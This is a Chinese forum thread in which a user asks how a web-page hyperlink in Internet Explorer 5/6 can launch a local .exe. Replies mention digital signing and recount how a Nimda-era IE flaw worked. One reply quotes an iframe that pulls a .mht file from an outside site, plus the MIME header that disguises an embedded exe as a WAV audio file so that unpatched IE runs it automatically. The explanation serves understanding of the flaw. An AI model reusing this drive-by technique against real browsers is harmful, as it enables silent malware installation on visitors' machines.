要求:通过Microsoft Internet Explorer 浏览器直接运行本地执行文件(.exe)
说明:浏览器IE5.0以上版本(包括IE6.0);可执行文件位于上网浏览者本地硬盘 C:\OA\CDOCDATA\BIN\OAGW.EXE
制作: 1.不能降低浏览器的安全权限,
2.当运行可执行文件出错时应给出相应的错误提示,
3.网页中以超链接形式表现。
请各位高手帮帮忙!
最好能给个例子或者是一些技术上的支持。谢谢!!!!!
说明:浏览器IE5.0以上版本(包括IE6.0);可执行文件位于上网浏览者本地硬盘 C:\OA\CDOCDATA\BIN\OAGW.EXE
制作: 1.不能降低浏览器的安全权限,
2.当运行可执行文件出错时应给出相应的错误提示,
3.网页中以超链接形式表现。
请各位高手帮帮忙!
最好能给个例子或者是一些技术上的支持。谢谢!!!!!
你说的很对,我也听人说是要数字签名的。
但苦于知识太乏。请问你能给一些关于数字签名
的实现方式呢?
谢谢先!!!
看到过去年(11月)程序员杂志对Nimda的分析,利用MIME漏洞,在邮件里面嵌入exe。
参看,那个首页里面的一段代码:
< iframe src=http://www.dj3344.com/dj3344/dj3344.mht ...... >
起作用的实际是这个dj3344.mht文件,也就是一个.eml格式的文件,
再下载这个mht文件之后,可以在其中看到如下代码:
--====B====
Content-Type: audio/x-wav;
name="dj3344.exe"
Content-Transfer-Encoding: base64
Content-ID: 这句话Content-Type: audio/x-wav;表明下面的那个dj3344.exe是页面的背景音乐wav,这就是IE的漏洞,它会不判断类型就直接打开。修补了漏洞之后这个exe才不会再有自动执行的机会。